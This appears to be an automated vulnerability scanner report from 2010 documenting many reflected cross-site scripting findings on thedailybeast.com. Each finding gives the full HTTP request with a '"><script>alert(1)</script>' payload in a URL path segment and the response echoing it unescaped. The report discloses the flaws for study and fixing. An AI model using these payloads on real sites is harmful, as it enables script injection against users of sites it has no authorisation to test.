The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bcd7"><script>alert(1)</script>8ada850f6ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-128bcd7"><script>alert(1)</script>8ada850f6ff/carnival-cruise-disaster-and-more-cruises-from-hell/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-128bcd7"><script>alert(1)</script>8ada850f6ff/carnival-cruise-disaster-and-more-cruises-from-hell/full/"/>
...[SNIP]...

1.12. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d09d"><script>alert(1)</script>1d8782345eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories5d09d"><script>alert(1)</script>1d8782345eb/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:56:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories5d09d"><script>alert(1)</script>1d8782345eb/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/full/"/>
...[SNIP]...

1.13. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 246b0"><script>alert(1)</script>9177b6d3c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-12246b0"><script>alert(1)</script>9177b6d3c1/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-12246b0"><script>alert(1)</script>9177b6d3c1/daily-beast-merges-with-newsweek-tina-brown-sidney-harman-and-barry-diller-weigh-in-/full/"/>
...[SNIP]...

1.14. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0b3d"><script>alert(1)</script>7793ee983a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-storiese0b3d"><script>alert(1)</script>7793ee983a6/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-storiese0b3d"><script>alert(1)</script>7793ee983a6/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/full/"/>
...[SNIP]...

1.15. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b707b"><script>alert(1)</script>38f741fa3b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-12b707b"><script>alert(1)</script>38f741fa3b6/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-12b707b"><script>alert(1)</script>38f741fa3b6/frank-sinatra-meets-ava-gardner-james-kaplans-frank-excerpt/full/"/>
...[SNIP]...

1.16. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5175f"><script>alert(1)</script>9021c6098d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories5175f"><script>alert(1)</script>9021c6098d8/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories5175f"><script>alert(1)</script>9021c6098d8/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/full/"/>
...[SNIP]...

1.17. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36012"><script>alert(1)</script>5491dc298ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-1236012"><script>alert(1)</script>5491dc298ac/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-1236012"><script>alert(1)</script>5491dc298ac/katy-perry-miley-cyrus-rihanna-and-more-stars-without-pants/full/"/>
...[SNIP]...

1.18. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e026"><script>alert(1)</script>6a4621cc101 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories1e026"><script>alert(1)</script>6a4621cc101/2010-11-12/november-13-the-week-in-viral-video/?cid=blogunit HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:50:21 GMT
Connection: close
Content-Length: 61650

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories1e026"><script>alert(1)</script>6a4621cc101/2010-11-12/november-13-the-week-in-viral-video/full/"/>
...[SNIP]...

1.19. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/november-13-the-week-in-viral-video/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d92"><script>alert(1)</script>96c4c1b7f30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-1277d92"><script>alert(1)</script>96c4c1b7f30/november-13-the-week-in-viral-video/?cid=blogunit HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.thedailybeast.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.thedailybeast.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:50:28 GMT
Connection: close
Content-Length: 61918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-1277d92"><script>alert(1)</script>96c4c1b7f30/november-13-the-week-in-viral-video/full/"/>
...[SNIP]...

1.20. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc3a5"><script>alert(1)</script>f69901111d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-storiesfc3a5"><script>alert(1)</script>f69901111d6/2010-11-12/the-lefts-deficit-outrage/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:56:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-storiesfc3a5"><script>alert(1)</script>f69901111d6/2010-11-12/the-lefts-deficit-outrage/full/"/>
...[SNIP]...

1.21. http://www.thedailybeast.com/blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /blogs-and-stories/2010-11-12/the-lefts-deficit-outrage/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67650"><script>alert(1)</script>fd243b0d6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs-and-stories/2010-11-1267650"><script>alert(1)</script>fd243b0d6a7/the-lefts-deficit-outrage/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 15:58:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/blogs-and-stories/2010-11-1267650"><script>alert(1)</script>fd243b0d6a7/the-lefts-deficit-outrage/full/"/>
...[SNIP]...

1.22. http://www.thedailybeast.com/cheat-sheet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b74b7"><script>alert(1)</script>c9cc6045e42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheetb74b7"><script>alert(1)</script>c9cc6045e42/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheetb74b7"><script>alert(1)</script>c9cc6045e42/"/>
...[SNIP]...

1.23. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4220"><script>alert(1)</script>ff258c38345 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheetc4220"><script>alert(1)</script>ff258c38345/item/crowds-await-suu-kyis-release/overdue-freedom/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheetc4220"><script>alert(1)</script>ff258c38345/item/crowds-await-suu-kyis-release/overdue-freedom/"/>
...[SNIP]...

1.24. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aafa2"><script>alert(1)</script>fae48031cf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/itemaafa2"><script>alert(1)</script>fae48031cf6/crowds-await-suu-kyis-release/overdue-freedom/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:05:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/itemaafa2"><script>alert(1)</script>fae48031cf6/crowds-await-suu-kyis-release/overdue-freedom/"/>
...[SNIP]...

1.25. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d710a"><script>alert(1)</script>3397b133924 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/crowds-await-suu-kyis-released710a"><script>alert(1)</script>3397b133924/overdue-freedom/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-released710a"><script>alert(1)</script>3397b133924/overdue-freedom/"/>
...[SNIP]...

1.26. http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40aac"><script>alert(1)</script>89bfa104e34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom40aac"><script>alert(1)</script>89bfa104e34/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __unam=c84b8fc-12c473cf84c-7e5976b8-6; __utmz=157974911.1289685366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|266F5AAA851D3203-40000140601D0BF5[CE]; s_sq=%5B%5BB%5D%5D; __utma=157974911.245470979.1289685366.1289685366.1289685549.2; __utmc=157974911; __qca=P0-1101498677-1289685372894; __utmb=157974911.1.10.1289685549;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Date: Sat, 13 Nov 2010 16:06:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" mlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="canonical" href="http://www.thedailybeast.com/cheat-sheet/item/crowds-await-suu-kyis-release/overdue-freedom40aac"><script>alert(1)</script>89bfa104e34/"/>
...[SNIP]...

1.27. http://www.thedailybeast.com/cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thedailybeast.com
Path:   /cheat-sheet/item/gop-hopefuls-jockey-for-donors/campaign-cash/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad64"><script>alert(1)</script>179a0ffcacf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cheat-sheet7ad64"><script>alert(1)</script>179a0ffcacf/item/gop-hopefuls-jockey-for-donors/campaign-cash/ HTTP/1.1
Host: www.thedailybeast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
